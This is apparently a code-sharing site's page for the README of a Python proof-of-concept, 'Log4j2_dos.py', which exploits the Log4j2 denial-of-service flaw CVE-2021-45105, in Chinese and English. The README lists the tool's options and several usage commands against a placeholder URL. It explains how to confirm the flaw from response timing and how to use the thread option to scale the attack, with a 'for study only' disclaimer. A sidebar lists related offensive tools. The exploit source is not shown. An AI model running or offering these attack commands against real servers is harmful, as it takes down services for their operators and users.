log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Last update: Aug 13, 2022

Overview

说明 about

author: 我超怕的

blog: https://www.cnblogs.com/iAmSoScArEd/

github: https://github.com/iAmSOScArEd/

date: 2021-12-20

log4j2 dos exploit

log4j2 dos 漏洞利用脚本

CVE-2021-45105 Exploit

CVE-2021-45105 利用脚本

利用方式 how to use

English：

Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>

-u,--url    	 attack target
-m,--method    http method, only get and post. default is get.
-d,--data   	 get or post params, json format like:{\"username\":\"\"}
-H,--header    request header, json format like:{\"user-agent\":\"\"}
-l,--loop    	 payload loop times (or length),default 100.it is determine where is the params, example get param max length or post param max length or request header max length
-t,--thread    attack thread. default is 0, just request once.

usage:
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500

Output format：

[+] normal time:0.11111

[+] attack time:2.00000

if attack time -normal time>1 or something，it maybe exist vulnerability，can use -t param set attack thread.

中文：

 Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
 
-u,--url   		 攻击目标
-m,--method    默认为get，http方式，仅支持get和post
-d,--data   	 get或post请求参数，json格式，如：{\"username\":\"\"}
-H,--header    请求头, json格式， 如：{\"user-agent\":\"\"}
-l,--loop    	 默认为100，payload循环长度,根据参数在不同的位置，设置不同的数值，如请求头最大允许长度、get最大长度、post最大长度
-t,--thread    默认为0,表示仅请求一次，攻击线程.。

输出格式：

[+] normal time:0.11111

[+] attack time:2.00000

如果attack time延迟很大，说明漏洞存在，可以利用-t参数设置攻击线程

免责声明

请勿用于非法用途，仅供学习参考。任何违法行为与本人无关。

蹩脚英语，没用翻译，将就看。

By：我超怕的

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Related tags

Overview

说明 about

利用方式 how to use

English：

中文：

免责声明

Owner

Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

Exploit tool for Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability

The Modern Hash Identification System

Python script to tamper with pages to test for Log4J Shell vulnerability.

Buff A simple BOF library I wrote under an hour to help me automate with BOF attack

The Decompressoin tool for Vxworks MINIFS

A Python wrapper around the OpenSSL library

Uncover the full name of a target on Linkedin.

log4j burp scanner

Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together.

Big-Papa Integrates Javascript and python for remote cookie stealing which then can be used for session hijacking

Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

Malware arcane - Scripts and notes on my malware analysis journey

ORector - A Fast Python tool designed to detect open redirects vulnerabilities on websites

Vulnerability Exploitation Code Collection Repository

Easily retargetable and hackable interactive disassembler with IDAPython-compatible plugin API

Repository for a project of the course EP2520 Building Networked Systems Security

A Python Tool that uses Shodan API's to perform quick recon for vulnerabilities

Agile Threat Modeling Toolkit

a cool, easily usable and customisable subdomains scanner